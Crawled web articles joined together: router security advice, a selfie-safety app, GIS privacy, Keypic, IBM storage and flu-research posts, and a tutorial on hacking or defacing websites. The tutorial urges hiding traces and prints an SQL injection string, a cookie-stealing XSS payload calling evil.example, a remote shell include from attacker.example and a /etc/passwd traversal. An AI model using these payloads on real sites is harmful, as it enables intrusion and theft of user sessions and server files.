Eiram believes that the absence of automatic updates is exactly the reason why embedded devices should have better code maturity and secure configurations from the beginning.
"To most home users, a router is that magical box in the corner, allowing them to go on the Internet," Eiram said. "Many are still struggling to update software on their computers that don't have auto-update features. Asking those users to log in and then configure or update their routers is not realistic."
For those users who do feel knowledgeable enough to configure their own routers, Eiram advises disabling access to the administration interface from the Internet, as that is usually the most commonly vulnerable feature.
"Ensuring other services are not remotely accessible is also a good idea, since we do see vulnerability reports in those as well," he said. "The problem here is that it is sometimes not even clear to users that a service is active and listening remotely. Finally, checking for updates regularly is important and usually possible from within the the web-based management interface." | <urn:uuid:6082a40e-05c3-47af-b61e-b3a5ea05bbce> | CC-MAIN-2017-09 | http://www.cio.com/article/2377383/security0/users-face-serious-threat-as-hackers-take-aim-at-routers--embedded-devices.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170992.17/warc/CC-MAIN-20170219104610-00164-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.958945 | 1,354 | 2.546875 | 3 |
Researchers are working on an app that could save people from being killed while taking dangerous selfies.
Carnegie Mellon University announced that researchers there are working with colleagues at Indraprastha Institute of Information Technology in Delhi, India to take on the issue of deadly selfies.
People around the globe have been putting themselves in reckless situations -- on railroad tracks, on cliff edges -- to grab a memorable selfie. Researchers found that individuals died falling from high places, while most group deaths happened around water, with some dying in capsized boats.
"In India, a number of deaths occurred when friends or lovers posed on railroad tracks, which is widely regarded as a symbol of long-term commitment in that culture," Carnegie Mellon reported. "Gun-related deaths in selfies occurred only in the U.S. and Russia. Road- and vehicle-related selfies and animal-related selfies also were associated with deaths."
Men accounted for three out of every four deaths, the report noted.
There's also concern that selfie deaths will continue to rise as taking dangerous selfies grows in popularity, with people using hashtags like #dangerousselfie and #extremeselfie.
Researchers culled public records to compile a list of 127 deaths associated with people around the world taking selfies between March 2014 and September 2016. Using that information, along with news reports on selfie-related deaths, researchers were able to design a system that uses location, image and text to classify whether a selfie was taken during a dangerous situation.
With machine learning, the researchers then taught a computer to look for dangerous selfies on social media sites. The computer, using image recognition, looked for dangerous locations like extreme heights, locations near water or near railways and busy roads. Analysis of the image itself, as well as of any text it contained, helped train the computer to classify a selfie as dangerous or not.
According to Carnegie Mellon, the system was able to tell the difference between a dangerous selfie and one that is not risky 73% of the time.
That technology will be critical to developing an app that could be used to decrease the number of selfie deaths.
An app, which has not yet been developed, could be designed to warn a user or even disable the phone if a selfie is being taken in a dangerous situation. The problem, though, is that some people might use a warning as bragging rights that they're brave enough to put themselves in a dangerous situation.
"There can be no app for stupidity," Hemank Lamba, a Ph.D. student in Carnegie Mellon's Institute for Software Research, said in a statement.
The app also could be used to pinpoint areas where people are routinely taking dangerous selfies so they could be marked as "no selfie" zones.
Carnegie Mellon also noted that an app could be used for augmented reality games, like Pokemon Go, to keep users from putting themselves in risky situations while playing.
"When you see a problem in society," he explained, "you find ways to use technology to solve it."
This story, "Researchers work to tame deadly selfies" was originally published by Computerworld. | <urn:uuid:676e3a93-064c-4bb9-9aed-2736fe79b3f5> | CC-MAIN-2017-09 | http://www.itnews.com/article/3144451/internet/researchers-work-to-tame-deadly-selfies.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174154.34/warc/CC-MAIN-20170219104614-00392-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.97374 | 633 | 2.984375 | 3 |
Harry Potter and the evolution of GIS
With geospatial advances, everyone might soon have a Marauder’s Map. Is that good?
- By Kevin McCaney
- Sep 17, 2010
In “Harry Potter and the Prisoner of Azkaban,” J.K. Rowling introduced the Marauder’s Map, a magical piece of parchment that would let the user see the location, around the clock and in real time, of everyone on the Hogwarts school grounds.
It was an ingenious notion that fit right in with Rowling’s fanciful world of potions, flying brooms and hippogriffs. But in an unusual twist of fact and fantasy, it turns out that, 11 years after the novel appeared, something like a Marauder’s Map isn’t that far from reality. Pretty soon, everybody might have one.
Advances in geographic information systems have been barreling forward of late. Combined with Global Positioning System data and sophisticated mapping software, geospatial applications are being applied to everything from emergency response to urban planning, and are moving into 3-D and even 4-D apps.
And one of the tools being developed for the not-too-distant future is geoSMS, which would allow the geotagging of Short Message Service messages, such as those used on Twitter. If you’re tweeting on the go, others would be able to follow your location. Get a lot of people involved, add a mapping app, and, theoretically, everyone could have a live map of everyone else’s location. Like magic.
An app like that would have obvious real-world advantages — in emergencies, for example, or in law enforcement and other field work. People in need of rescue could be found more easily. People on a mission could be tracked.
But as with any innovation, this has its good side and its dark side. People have recently raised red flags about cameras and smart phones with GPS receivers, which embed geographic coordinates into pictures taken with the devices. If such a photo is posted on the Web, anyone using one of several free apps can easily derive the location where it was taken. Security experts also have warned the military that hacked smart phones could reveal troop locations to the enemy. Geotags on text messages likewise could be a double-edged sword.
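As a rough illustration of how little effort this takes, the sketch below uses the Pillow imaging library to pull GPS coordinates, if present, out of a photo's EXIF metadata; the file name is hypothetical.

```python
# Illustrative sketch: reading embedded GPS coordinates from a geotagged photo.
from PIL import Image
from PIL.ExifTags import TAGS, GPSTAGS

exif = Image.open("photo.jpg")._getexif() or {}                       # raw EXIF, keyed by numeric tag ID
named = {TAGS.get(tag, tag): value for tag, value in exif.items()}    # map IDs to readable names
gps = {GPSTAGS.get(tag, tag): value for tag, value in named.get("GPSInfo", {}).items()}

print(gps.get("GPSLatitude"), gps.get("GPSLatitudeRef"))
print(gps.get("GPSLongitude"), gps.get("GPSLongitudeRef"))
```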
Of course, possible vulnerabilities won't stop their use. For one thing, the potential benefits are too great. For another, they're bound to be popular — both on the job and on the street.
But there are ways to prevent their misuse. With cameras and smart phones, users can turn off geotagging features, although they have to know how.
The key seems to be educating users about when it is appropriate to use these features — an admittedly thin line of defense but perhaps the only realistic one. More powerful geolocation apps are on the way, and users need to be aware that some dark forces certainly will be looking to take advantage of them.
After all, the Marauder’s Map only worked when the user tapped the map with a wand and uttered the incantation, “I solemnly swear that I am up to no good.”
Kevin McCaney is a former editor of Defense Systems and GCN. | <urn:uuid:6fed014b-ab87-4018-a050-97c8bfc60bf2> | CC-MAIN-2017-09 | https://gcn.com/articles/2010/09/20/editorial-harry-potter-gis.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170434.7/warc/CC-MAIN-20170219104610-00160-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.954326 | 704 | 2.71875 | 3 |
I will explain the fourth point, that you should be an expert in removing traces, in my future articles. Traces are very important. Please don't ignore them or you will experience a lot of problems. Keep reading, or simply subscribe to our posts.
1. SQL INJECTION
The primary form of SQL injection consists of code being directly inserted into user-input variables that are concatenated with SQL commands and executed. A less direct attack injects malicious code into strings that are destined for storage in a table or as metadata. When the stored strings are subsequently concatenated into a dynamic SQL command, the malicious code is executed.
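To make that concrete, here is a minimal illustration (Python and SQLite are used purely for demonstration; the table and payload are invented): the first query concatenates user input straight into the SQL string, while the second binds it as a parameter so it can never execute as code.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'secret')")

user_input = "' OR '1'='1"   # a classic injection payload

# VULNERABLE: the payload becomes part of the SQL command and matches every row.
query = "SELECT * FROM users WHERE name = '" + user_input + "'"
print(conn.execute(query).fetchall())        # returns alice's row despite the bogus name

# SAFE: the input is bound as data, so the payload is just a strange user name.
print(conn.execute("SELECT * FROM users WHERE name = ?", (user_input,)).fetchall())  # []
```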
2. CROSS SITE SCRIPTING (XSS)
Cross-site scripting (XSS) occurs when an attacker inputs malicious data into a website, which causes the application to do something it wasn't intended to do. XSS attacks are very common, and some of the biggest websites have been affected by them, including those of the FBI, CNN, eBay, Apple, Microsoft, and AOL.
Some website features commonly vulnerable to XSS attacks are:
• Search Engines
• Login Forms
• Comment Fields
Cross-site scripting holes are web application vulnerabilities that allow attackers to bypass client-side security mechanisms normally imposed on web content by modern browsers. By finding ways of injecting malicious scripts into web pages, an attacker can gain elevated access privileges to sensitive page content, session cookies, and a variety of other information maintained by the browser on behalf of the user. Cross-site scripting attacks are therefore a special case of code injection.
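A small, generic illustration of the reflected variety (not tied to any particular site): if user-supplied text is dropped into a page unescaped, a script tag in that text runs in the victim's browser, while HTML-escaping the same payload renders it as harmless text.

```python
import html

def search_results_page(query: str, escape: bool) -> str:
    # Build a results page that embeds whatever the user searched for.
    shown = html.escape(query) if escape else query
    return "<h1>Results for: " + shown + "</h1>"

payload = '<script>document.location="http://evil.example/?c="+document.cookie</script>'

print(search_results_page(payload, escape=False))  # script executes when the page is rendered
print(search_results_page(payload, escape=True))   # rendered as literal text, no execution
```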
I will explain this in detail in later hacking classes, so keep reading.
3. REMOTE FILE INCLUSION
Remote file inclusion is the vulnerability most often found on websites.
Remote File Inclusion (RFI) occurs when a remote file, usually a shell (a script that gives the attacker an interface for browsing files and running code on a server), is included on a website, which allows the hacker to execute server-side commands as the currently logged-on user and to access files on the server. With this power the hacker can go on to use local exploits to escalate his privileges and take over the whole system.
RFI can lead to the following serious things on website:
- Code execution on the web server
- Denial of Service (DoS)
- Data Theft/Manipulation
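The textbook RFI case involves PHP's include() pulling in whatever URL an attacker supplies. The sketch below shows the same anti-pattern transplanted to Python purely for illustration, along with the obvious fix of only including pages from a fixed whitelist; the page names and URLs are invented.

```python
import urllib.request

PAGES = {"about": "pages/about.html", "contact": "pages/contact.html"}  # hypothetical site pages

def render_vulnerable(page_param: str) -> None:
    # DANGEROUS: if page_param is "http://attacker.example/shell.txt", the server
    # downloads attacker-controlled code and runs it -- the essence of RFI.
    source = urllib.request.urlopen(page_param).read()
    exec(compile(source, page_param, "exec"))

def render_safe(page_param: str) -> str:
    # Only file paths from a fixed whitelist can ever be included.
    path = PAGES.get(page_param, PAGES["about"])
    with open(path, encoding="utf-8") as f:
        return f.read()
```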
4. LOCAL FILE INCLUSION
Local File Inclusion (LFI) is when you have the ability to browse through the server by means of directory traversal. One of the most common uses of LFI is to discover the /etc/passwd file. This file contains the user information of a Linux system. Hackers find sites vulnerable to LFI the same way I discussed for RFIs.
Let's say a hacker found a vulnerable site, like www.target-site.com/index.php?p=about. By means of directory traversal, he would then try to browse to the /etc/passwd file:
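A request exploiting this typically looks something like www.target-site.com/index.php?p=../../../../etc/passwd (a hypothetical URL, shown only to illustrate the pattern). The short Python sketch below shows why the trick works and how a realpath check blocks it; the directory path is invented.

```python
import os

WEB_ROOT = "/var/www/site/pages"          # hypothetical directory the app is meant to serve

def load_page_vulnerable(name: str) -> str:
    # "p=../../../../etc/passwd" escapes WEB_ROOT because ".." segments are never checked.
    with open(os.path.join(WEB_ROOT, name), encoding="utf-8") as f:
        return f.read()

def load_page_safe(name: str) -> str:
    # Resolve the final path and refuse anything that lands outside WEB_ROOT.
    full = os.path.realpath(os.path.join(WEB_ROOT, name))
    if not full.startswith(WEB_ROOT + os.sep):
        raise PermissionError("directory traversal attempt blocked")
    with open(full, encoding="utf-8") as f:
        return f.read()
```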
I will explain it in detail, with practical website examples, in later classes on website hacking.
5. DDOS ATTACK
This is simply called a distributed denial-of-service attack. A denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a computer resource unavailable to its intended users. Although the means to carry it out, the motives for, and the targets of a DoS attack may vary, it generally consists of the concerted efforts of a person or people to prevent an internet site or service from functioning efficiently or at all, temporarily or indefinitely. In a DDoS attack, the attacker consumes the bandwidth and resources of a website and makes them unavailable to its legitimate users.
This category is not entirely new; it overlaps with the five categories above, but I mention it separately because there are several exploits that cannot be covered neatly by those categories. I will explain them individually with examples. The basic idea is to find a vulnerability in the website and exploit it to gain admin or moderator privileges so that you can manipulate things easily.
I hope you all now have an overview of website hacking. In future classes I will explain all of these techniques in detail, so please keep reading.
IF YOU HAVE ANY QUERIES ASK IN THE COMMENTS… | <urn:uuid:76b67793-feda-4e86-9dfe-84d515b99af3> | CC-MAIN-2017-09 | https://www.hackingloops.com/6-ways-to-hack-or-deface-websites-online/?showComment=1312697219134 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171232.43/warc/CC-MAIN-20170219104611-00036-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.925406 | 872 | 3.296875 | 3 |
A few days ago I wrote about an artificial intelligence startup, Vicarious, which demonstrated software that breaks the widely used - and much disliked by users - CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) used to prevent software run by the bad guys from automating the creation of, and hacking into, accounts on Web sites.
The reason CAPTCHA is disliked by users is that it has become hard even for humans to pass the test; the distorted images employed have become so difficult to read that most people have significant trouble decoding the text and, as a consequence, often give up when creating accounts and using services.
A new company, Keypic, may have the answer to these problems by doing away with CAPTCHA altogether and replacing it with their own eponymously named verification system. In fact Keypic can not only rate how human a user is but can also detect spam submitted as comments.
Keypic works by presenting whatever form you please along with an image. The image can be as minimal as a single transparent pixel, or it can be a logo or even an advertising banner. The purpose of the image is to ensure that it's retrieved (most hackers' automation won't bother with graphical elements; it will usually just retrieve the form, fill it in and submit it).
Whether the image is retrieved is just one of the ten or so data points Keypic checks. Other data points include how long it takes for the form to be submitted (which reveals software that tries to submit at a high rate), what order the fields are filled in, what the IP address is, what browser is being used, how many requests are received per minute from a single IP address, and the characteristics of any text entered into fields other than name and password.
The data points are analyzed by comparing them to Keypic's database of thousands of other form submissions, and a score is calculated indicating how likely the submission is to be fake. You can then decide, based on that score, whether to accept and act on the form data or reject the submission.
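Keypic's real scoring backend is proprietary, so the following is no more than a rough guess at the shape of such a scorer: a few of the signals described above, each adding to a "fakeness" score that the site owner compares against a threshold of their choosing. All names, weights and thresholds here are invented.

```python
# Purely illustrative scoring sketch -- the signal names, weights and threshold are made up.
def fakeness_score(submission: dict) -> int:
    score = 0
    if not submission.get("image_fetched", False):             # bots often skip page graphics
        score += 30
    if submission.get("seconds_to_submit", 999) < 2:           # faster than a human can type
        score += 30
    if submission.get("requests_per_minute_from_ip", 0) > 20:  # burst of posts from one address
        score += 25
    if submission.get("fields_filled_out_of_order", False):
        score += 15
    return min(score, 100)

sample = {"image_fetched": False, "seconds_to_submit": 1, "requests_per_minute_from_ip": 45}
accept = fakeness_score(sample) < 50    # threshold left to the site operator
print(fakeness_score(sample), accept)
```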
For a program to get past Keypic would require that it behave in a very human way: taking enough time to respond, downloading all page content, limiting the submission rate from any single IP address, and so on. Defeating this range of tests would require some pretty creative coding, and that's the key to detecting non-human interactions.
The client side of Keypic is free and open source, while the backend that actually determines the score is proprietary and closed source. Keypic is currently available as a plugin for WordPress, Drupal, Joomla, and TYPO3, as well as a REST Web service, a PHP class, and versions for ASP and ASP.NET.
My only reservation about Keypic is that although the company is based in the US (in Walnut, CA, in Silicon Valley) their Web site is a horrible mess of poor design, misspellings, weak explanations, and broken links.
So, is Keypic more effective than CAPTCHA? That all depends on what you value. If you believe that you're losing traffic and users because CAPTCHA tests put them off then there's a very good reason to use Keypic. As of writing over 5,800 sites are using the system and over 113.5 million spam messages have been blocked without CAPTCHAs.
On the other hand if you are adamant that you can't tolerate any non-humans at all accessing your site you might want to stick with CAPTCHA ... remembering, of course, that the test has been shown to be broken at a level that will eventually (and, in fact, sooner rather than later) render it useless. I think my money is on Keypic. | <urn:uuid:c9fa77a8-da26-4afb-a665-2cd87adde3da> | CC-MAIN-2017-09 | http://www.networkworld.com/article/2225794/security/keypic--replacing-captcha-without-annoying-users--updated-.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170521.30/warc/CC-MAIN-20170219104610-00508-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.963875 | 763 | 2.5625 | 3 |
Learn about the threats, risks and how to protect yourself.
Recently there has been increased media coverage regarding "BadUSB".
BadUSB is a way to manipulate, in theory, any USB device so that it is infected with a virus (or other types of malware). In plain terms, this means an attacker takes a regular USB device, which contains a small microcontroller, manipulates its firmware (which is in effect a small operating system that makes the microcontroller work) and infects it with malware. This turns the USB device into a tool for further manipulating your computer.
In reality, this is very hard for an attacker to do, but not impossible. The security researchers who revealed this threat typically use a specific USB flash drive (for which they have the firmware) and manipulate it.
The result is that the USB flash drive will trick your computer, pretend it is a keyboard and then execute some commands. Your computer cannot tell the difference if the input it gets is coming from you typing on the keyboard or if the manipulated USB device is actually sending commands. Both inputs look the same to your computer. For an attacker to do this with a USB device, other than the one he is familiar with, is not easy to do.
This threat is real, but it has also been present since the introduction of USB more than a decade ago. It is a weakness of the USB standard and of the most common operating systems, such as Windows. Since the operating system has no built-in option to verify the firmware of USB hardware, it trusts that a device connected to the USB port is the device type it claims to be. For executables, your operating system checks their integrity using a process called "code signing". This code-signing check is not available for the firmware running in a USB device.
If an attack occurs using the BadUSB method, your computer can be infected with any kind of malware. This is what your Anti-Virus (Anti-Malware) solution will or will not detect. At that point, it will unfortunately be too late: your computer will remain compromised until it has been disinfected, which could take hours, days or weeks. Please remember that at this stage this is just a proof of concept and there are no known attacks "in the wild".
BadUSB can act like different input/output devices, such as a physical keyboard, mouse, network adapter, phone, tablet, webcam, or authentication token. For example, if it pretends to be a keyboard or mouse, the malicious software can inject keystrokes and mouse clicks, performing multiple actions on the computer, such as launching Microsoft Outlook and sending an e-mail to a certain address with attached files from the user's computer. If it pretends to be an authentication token, a BadUSB device could force the computer to prompt for a token password, which can then be stored on the flash drive and retrieved at a later date.
What you can do to protect yourself now
Connect only USB devices from vendors you know (e.g. keyboard and mouse from a trusted vendor).
Keep your anti-malware updated. It will not scan the firmware but it should detect if the BadUSB tries to install or run malware.
Use a device control solution like Endpoint Protector that will monitor the use of devices connected to your computer.
Make sure you use strong passwords for your user account on your computer and never leave it unlocked or unattended. | <urn:uuid:34aaf1dc-eebd-4f38-a912-3272d1bd5acf> | CC-MAIN-2017-09 | https://www.endpointprotector.com/solutions/badusb-protection | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171646.15/warc/CC-MAIN-20170219104611-00560-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.93241 | 715 | 3.25 | 3 |
Potential advantages include better backup and replication, centralized management, scalability, and sharing of resources, files, and data.
By Greg P. Schulz
The Internet has changed the way business is conducted. Information must be available 7x24x365, from anywhere in the world. New business models (e.g., "virtual stores") have emerged, forcing changes in technology infrastructures to support dynamic business requirements.
With the rapid and continued growth of the Internet, a new category of business has emerged, sometimes referred to as Internet-Related Business (IRB). IRBs include Internet Service Providers (ISPs), Application Service Providers (ASPs), e-commerce companies, and others.
The common services needed by IRBs include networking, processing, management, and information storage. A storage area network (SAN) enables these services via storage resource sharing, file and data sharing, backup, replication, management, and scalability.
In a SAN or storage utility model, servers and storage resources plug into service access connection points.
SANs enable IRBs to remove or abstract physical storage and information from specific host systems. This flexibility enables companies to meet the changing and dynamic needs of the IRB environment, including acquisitions, mergers, expansion, and new services.
Storage management for IRBs
Networking technology is the basis of the infrastructure we now call the Internet or World Wide Web. Now, a similar transformation is occurring on the "other" (e.g., storage) side of servers. Several technologies exist to enable concepts such as "storage utilities" to be implemented in an open, cost-effective manner.
Storage area network is the generic term used to describe the combination of these technologies, including Fibre Channel. SANs and associated technology enable the storage utility model to be implemented.
For IRBs and other organizations, the potential benefits of SANs and storage utilities include:
- Increased ability to share information resources and data.
- Reduced duplication (hardware, service agreements, staffing).
- Centralized management of distributed environments.
- Reduced complexity (interfaces, devices, management, backup).
- Flexibility to adapt and implement new business objectives.
- Increased investment protection and asset utilization.
- Increased distance between servers and storage devices.
- Simplified backup and recovery for data protection.
SANs and storage utilities are conceptually similar to utilities such as phone and electric services providers. Rather than having one physical server with duplicated resources (disk, tape, backup, and management), each device plugs into a service access connection point (see figure above). From these connection points, the systems supporting various applications or IRB functions can access and use the storage or data services they need.
SANs enable replication, remote mirroring, centralized backup, and data sharing between various server platforms.
The storage utility, SAN, or data services model empowers IRBs to solve specific business issues. Consider an environment with two sites, one on the West Coast and the other on the East Coast (see figure). In this example, different aspects of IRB storage management can be addressed, including replication or remote mirroring, backup, and data sharing for Web, email, database, and news servers.
Critical data is replicated or remotely mirrored between the two locations, and perhaps others, for high availability and workload balancing. To help reduce management, replication and data migration are used to reduce the backup window, maintain data availability, and speed Web data migration.
Some common storage or data services required for IRBs include block, file, connection, backup, replication, management, and support services.
- Block services. The basic building block for a SAN or data services model is block storage, provided by RAID arrays. A block service device provides high availability via fully redundant components to provide high performance and fault isolation. Block service devices should be scalable, modular, and flexible to meet the changing needs of IRBs' dynamic application requirements. Storage allocation, security, and setup should be flexible and under user control. To exist in an open environment, block devices should be host independent, without requiring special host software or drivers.
- File services. File services provide file and data sharing using underlying block services to serve data and files to Web hosts and clients. Data and files are accessed via standard network interfaces (e.g., Ethernet, FDDI, ATM) using protocols such as NFS and CIFS/SMB. In the past, file services have been possible by attaching dedicated storage directly to host systems and serving it to clients or by dedicating storage to a file-server appliance. In the storage utility, SAN, or data services model, block storage is available for use by hosts, as well as for file services without being dedicated to any one platform.
- Connection services. Connection services provide the infrastructure and include Fibre Channel switches, hubs, host bus adapters, cabling, diagnostics, network interfaces, and management capabilities. The connection services should be interoperable, scalable, and modular to adapt to the dynamic needs of IRBs.
- Backup and recovery services. Whether restoring an accidentally deleted home page, restoring a journal file to resolve a billing or security issue, or recovering lost data, backup and recovery services complement high-availability block services.
Backup services can be used to migrate backups off LANs to shared tape libraries for LAN-free backup, which can evolve to server-less backup. Backup services should provide on-demand backup and restore, the ability to back up open files and databases without having to take applications off-line, and the ability to perform remote backup and recovery.
- Replication services. Block services with RAID protection, combined with backup/recovery and replication of data to other locations, not only provide the highest levels of data protection and accessibility for IRBs, but also management and configuration flexibility. Replication or remote mirroring can be used for data movement between data centers during application rollouts, turnovers, consolidations, and for load balancing. In addition, replication services and remote/local mirroring can help reduce backup windows for IRBs by keeping data available and providing multi-site protection of critical data.
IRBs provide data and information on a 7x24x365 basis. Flexible services to meet the dynamic needs of IRBs are needed to provide storage and access for critical data when and where it is needed. Implementing the storage utility model with SAN technology, information can now be stored where it is needed without having to have it physically connected to specific servers.
Greg P. Schulz is a senior technologist at MTI Technology Corp. (www.mti.com), in Anaheim, CA. | <urn:uuid:bb521d68-25b4-401f-a91f-b23c382b104e> | CC-MAIN-2017-09 | http://www.infostor.com/index/articles/display/65889/articles/infostor/volume-4/issue-2/features/sans-enable-internet-related-businesses.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171936.32/warc/CC-MAIN-20170219104611-00084-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.922868 | 1,369 | 2.703125 | 3 |
Recently, IBM and the University of Texas Medical Branch (UTMB) [launched an effort] using IBM's World Community Grid "virtual supercomputer" to allow laboratory tests on drug candidates for drug-resistant influenza strains and new strains, such as H1N1 (aka "swineflu"), in less than a month.
Researchers at the University of Texas Medical Branch will use [World Community Grid] to identify the chemical compounds most likely to stop the spread of the influenza viruses and begin testing these under laboratory conditions. The computational work adds up to thousands of years of computer time which will be compressed into just months using World Community Grid. As many as 10 percent of the drug candidates identified by calculations on World Community Grid are likely to show antiviral activity in the laboratory and move to further testing.
According to the researchers, without access to World Community Grid's virtual super computing power, the search for drug candidates would take a prohibitive amount of time and laboratory testing.
A few months after Larry's "call to action" in 2006, IBM and over twenty major worldwide public health institutions, including the World Health Organization [WHO] and the Centers for Disease Control and Prevention [CDC], [announced the Global Pandemic Initiative], a collaborative effort to help stem the spread of infectious diseases.
One might think that, given our proximity to Mexico, the first cases would have been in the border states, such as Arizona, but instead there were cases as far away as New York and Florida. The NYT explains in an article [Predicting Flu With the Aid of (George) Washington] that two rival universities, Northwestern University and Indiana University, both predicted that there would be about 2500 cases in the United States, based on air traffic control flight patterns and the tracking data from a Web site called ["Where's George"], which tracks the movement of US dollar bills stamped with the Web site URL.
The estimates were fairly close. According to the Centers for Disease Control and Prevention [H1N1 Flu virus tracking page], there are currently 3009 cases of H1N1 in 45 states, as of this writing.
This is just another example of how an information infrastructure, used properly to provide insight, make predictions, and analyze potential cures, can help the world be a smarter planet. Fortunately, IBM is leading the way.
My post last week [Solid State Disk on DS8000 Disk Systems] kicked up some dust in the comment section. Fellow blogger BarryB (a member of the elite [Anti-Social Media gang from EMC]) tried to imply that 200GB solid state disk (SSD) drives were different or better than the 146GB drives used in IBM System Storage DS8000 disk systems. I pointed out that they are actually the same physical drive, just formatted differently.
To explain the difference, I will first have to go back to regular spinning Hard Disk Drives (HDD). There are variances in manufacturing, so how do you make sure that a spinning disk has AT LEAST the amount of space you are selling it as? The solution is to include extra. This is the same way that rice, flour, and a variety of other commodities are sold. Legally, if it says you are buying a pound or kilo of flour, then it must be AT LEAST that much to be legal labeling. Including some extra is a safe way to comply with the law. In the case of disk capacity, having some spare capacity and the means to use it follows the same general concept.
(Disk capacity is measured in multiples of 1000, in this case a Gigabyte (GB) = 1,000,000,000 bytes, not to be confused with [Gibibyte (GiB)] = 1,073,741,824 bytes, based on multiples of 1024.)
Let's say a manufacturer plans to sell a 146GB HDD. We know that in some cases there might be bad sectors on the disk that won't accept written data on day 1, and there are other marginally-bad sectors that might fail to accept written data a few years later, after wear and tear. A manufacturer might design a 156GB drive with 10GB of spare capacity and format this with a defective-sector table that redirects reads/writes of known bad sectors to good ones. When a bad sector is discovered, it is added to the table, and a new sector is assigned out of the spare capacity. Over time, the amount of space that a drive can store diminishes year after year, and once it drops below its rated capacity, it fails to meet its legal requirements. Based on averages of manufacturing runs and material variances, these could then be sold as 146GB drives, with a life expectancy of 3-5 years.
With Solid State Disk, the technology requires a lot of tricks and techniques to stay above the rated capacity. For example, you can format a 256GB drive as a conservative 146GB usable, with an additional 110GB (75 percent) spare capacity to handle all of the wear-leveling. You could lose up to 22GB of cells per year, and still have the rated capacity for the full five-year life expectancy.
Alternatively, you could take a more aggressive format, say 200GB usable, with only 56GB (28 percent) of spare capacity. If you lost 22GB of cells per year, then sometime during the third year, hopefully under warranty, your vendor could replace the drive with a fresh new one, and it should last the rest of the five year time frame. The failed drive, having 190GB or so usable capacity, could then be re-issued legally as a refurbished 146GB drive to someone else.
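A quick back-of-the-envelope check of those two formatting choices, using the figures above (256GB of raw flash and roughly 22GB of cells lost to wear per year):

```python
# Back-of-the-envelope check of the two SSD formatting choices described above.
raw_capacity  = 256   # GB of physical flash on the drive
wear_per_year = 22    # GB of cells assumed to wear out each year

for usable, label in [(146, "conservative"), (200, "aggressive")]:
    spare = raw_capacity - usable
    years_before_shortfall = spare / wear_per_year
    print(f"{label}: {usable} GB usable, {spare} GB spare "
          f"-> stays above rated capacity for ~{years_before_shortfall:.1f} years")

# conservative: 110 GB spare -> ~5.0 years (the full expected service life)
# aggressive:    56 GB spare -> ~2.5 years (replacement likely while still under warranty)
```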
The wear and tear on an SSD happens mostly during erase-write cycles, so for read-intensive workloads, such as boot disks for operating system images, the aggressive 200GB format might be fine, and might last the full five years. For traditional business applications (70 percent read, 30 percent write) or more write-intensive workloads, IBM feels the more conservative 146GB format is a safer bet.
This should be of no surprise to anyone. When it comes to the safety, security and integrity of our clients' data, IBM has always emphasized the conservative approach.
Looks like fellow blogger and arch nemesis BarryB from EMC is once again stirring up trouble; this time he focuses his attention on IBM's leadership in Solid State Disk (SSD) on the IBM System Storage DS8000 disk systems in his post [IBM's amazing splash dance, part deux], a follow-up to [IBM's amazing splash dance] and multi-vendor tirade [don't miss the amazing vendor flash dance].
(Note: IBM [Guidelines] prevent me from picking blogfights, so this post is only to set the record straight on some misunderstandings, point to some positive press about IBM's leadership in this area, and for me to provide a different point of view.)
First, let's set the record straight on a few things. The [RedPaper is still in draft form] under review, and so some information has not yet been updated to reflect the current situation.
I find it amusing that BarryB's basic argument is that IBM's initial release of SSD on the DS8000 delivers less than what the architecture could be extended to support. Actually, if you look at EMC's November release of Atmos, as well as their most recent announcement of V-Max, they basically say the same thing: "Stay tuned, this is just our initial release, with various restrictions and limitations, but more will follow." Architecturally, the IBM DS8000 could support a mix of SSD and non-SSD on the same DA pairs, could support RAID6 and RAID10 as well, and could support larger capacity drives or use higher-capacity read-intensive formats. These could all be done via RPQ if needed, or in a follow-on release.
BarryB's second argument is that IBM is somehow "throwing cold water" on SSD technology; that somehow IBM is trying to discourage people from using SSD by offering disk systems with this technology. IBM offered SSD storage on BladeCenter servers LONG BEFORE any EMC disk system offering, and IBM continues to innovate in ways that allow the best business value of this new technology. Take for example this 24-page IBM Technical Brief: [IBM System z® and System Storage DS8000: Accelerating the SAP® Deposits Management Workload With Solid State Drives]. It is full of example configurations that show that SSD on the IBM DS8000 can help in practical business applications. IBM takes a solution view, and worked with DB2, DFSMS, z/OS, High Performance FICON (zHPF), and down the stack to optimize performance to provide real business value innovation. Thanks to this synergy, IBM can provide 90 percent of the performance improvement with only 10 percent of the SSD disk capacity of EMC offerings. Now that's innovative!
The price and performance differences between FC and SATA (what EMC was mostly used to) are only 30-50 percent. But the price and performance differences between SSD and HDD are more than an order of magnitude, in some cases 10-30x, similar to the differences between HDD and tape. Of course, if you want hybrid solutions that take best advantage of SSD+HDD, it makes more sense to go to IBM, the leading storage vendor that has been doing HDD+Tape hybrid solutions for the past 30 years. IBM understands this better, and has more experience dealing with these orders of magnitude than EMC.
But don't just take my word for it. Here is an excerpt from Jim Handy, from [Objective Analysis] market research firm, in a recent Weekly Review from [Pund-IT] (Volume 5, Issue 23--May 6, 2009):
As for why STEC put out a press release on their own this week without a corresponding IBM press release, I can only say that IBM already announced all of this support back in February, and I blogged about it in my post [Dynamic Infrastructure - Disk Announcements 1Q09]. This is not the first time one of IBM's suppliers has tried to drum up business in this manner. Intel often funds promotions for IBM System x servers (the leading Intel-based servers in the industry) to help drive more business for their Xeon processor.
So, BarryB, perhaps it's time for you to take out your green pen and work up another one of your all-too-common retractions and corrections.
